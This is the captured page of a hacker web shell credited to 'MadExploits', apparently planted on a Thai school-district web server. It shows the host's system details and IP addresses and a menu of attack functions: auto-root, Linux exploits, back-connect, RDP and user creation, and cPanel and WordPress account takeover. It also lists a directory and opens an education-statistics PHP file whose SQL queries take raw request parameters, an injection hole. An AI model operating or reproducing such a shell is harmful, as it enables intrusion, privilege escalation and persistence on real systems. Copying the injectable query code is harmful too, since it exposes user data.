Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
export /
[ HOME SHELL ]
Name
Size
Permission
Action
achievement.php
6.34
KB
-rw-r--r--
building.php
2.28
KB
-rw-r--r--
nt.php
1.7
KB
-rw-r--r--
opportunity.php
7.56
KB
-rw-r--r--
opportunity2.php
7.56
KB
-rw-r--r--
opportunity3.php
7.57
KB
-rw-r--r--
person.php
1.48
KB
-rwxr-xr-x
plc.php
530
B
-rw-r--r--
read.php
2.47
KB
-rw-r--r--
school_basic.php
1.79
KB
-rw-r--r--
school_computer.php
1.44
KB
-rw-r--r--
standard.php
7.45
KB
-rw-r--r--
standard2.php
2.89
KB
-rw-r--r--
standard2021.php
2.31
KB
-rw-r--r--
standard2041.php
10.38
KB
-rw-r--r--
standard3.php
11.49
KB
-rw-r--r--
standard4.php
2.86
KB
-rw-r--r--
student.php
2.12
KB
-rw-r--r--
student2.php
885
B
-rw-r--r--
student_expand1.php
1.23
KB
-rw-r--r--
student_expand2.php
6.25
KB
-rw-r--r--
warning.php
81
B
-rwxr-xr-x
xml.php
1.36
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : standard4.php
<?php defined( '_VALID_' ) or die( 'Direct Access to this location is not allowed.' ); ?> <info> <warning><?php echo base64_encode($warning_text);?></warning> <ed_year><?php echo base64_encode($_GET['val3']);?></ed_year> <section><?php echo base64_encode($_GET['val4']);?></section> <student> <?php $school_code=$_GET['school_code']; $year_index=$_GET["val3"]; $section=$_GET["val4"]; // เชื่อมdatabase ชื่อ amssplus_bets ///////// $user_db=$user; if(isset($amssplus_bets)){ $amssplus_bets=$amssplus_bets; } else{ $amssplus_bets="amssplus_bets"; } $connect_bets=@mysqli_connect($hostname,$user_db,$password,$amssplus_bets); if($connect_bets){ mysqli_query($connect_bets,"SET NAMES utf8"); } ///////// //end ///////////////////////////////////////////////// $level[-5]="อนุบาล 1"; $level[-6]="อนุบาล 1"; $level[-3]="อนุบาล 2"; $level[-4]="อนุบาล 2"; $level[-1]="อนุบาล 3"; $level[-2]="อนุบาล 3"; $subject_ar[1]="kindergarten"; $subject_num=0; $thai_num=0; $thai_avg=""; for($x=-6; $x<0; $x++){ $y=abs($x); if($section==1){ if($y%2!=0){ continue; } } else{ if($y%2==0){ continue; } } for($y=1; $y<=1; $y++){ $sql_num = "select id from $subject_ar[$y] where school_code='$_REQUEST[school_code]' and level='$x' and ed_year='$year_index'"; $sql_pass = "select id from $subject_ar[$y] where score>='50' and school_code='$_REQUEST[school_code]' and level='$x' and ed_year='$year_index'"; $sql_avg = "select avg(score) as score_avg from $subject_ar[$y] where school_code='$_REQUEST[school_code]' and level='$x' and ed_year='$year_index'"; $dbquery_num = mysqli_query($connect_bets,$sql_num); $std_number=mysqli_num_rows($dbquery_num); $dbquery_pass = mysqli_query($connect_bets,$sql_pass); $std_pass=mysqli_num_rows($dbquery_pass); $dbquery_avg = mysqli_query($connect_bets,$sql_avg); $result_avg = mysqli_fetch_array($dbquery_avg); $score_avg=$result_avg['score_avg']; $pass_percent=""; if($std_number!=0){ $pass_percent=$std_pass/$std_number*100; $subject_num++; if($y==1){ $thai_num++; $thai_avg=$thai_avg+$pass_percent;; } } ?> <item> <level><?php echo base64_encode($x);?></level> <subject><?php echo base64_encode($y);?></subject> <pass_percent><?php echo base64_encode($pass_percent);?></pass_percent> <score_avg><?php echo base64_encode($score_avg);?></score_avg> </item> <?php } // for y } //for x if($thai_avg!=0){ $thai_avg=$thai_avg/$thai_num; $thai_avg=number_format($thai_avg,2); } ?> </student> <thai_avg><?php echo base64_encode($thai_avg);?></thai_avg> </info>
Close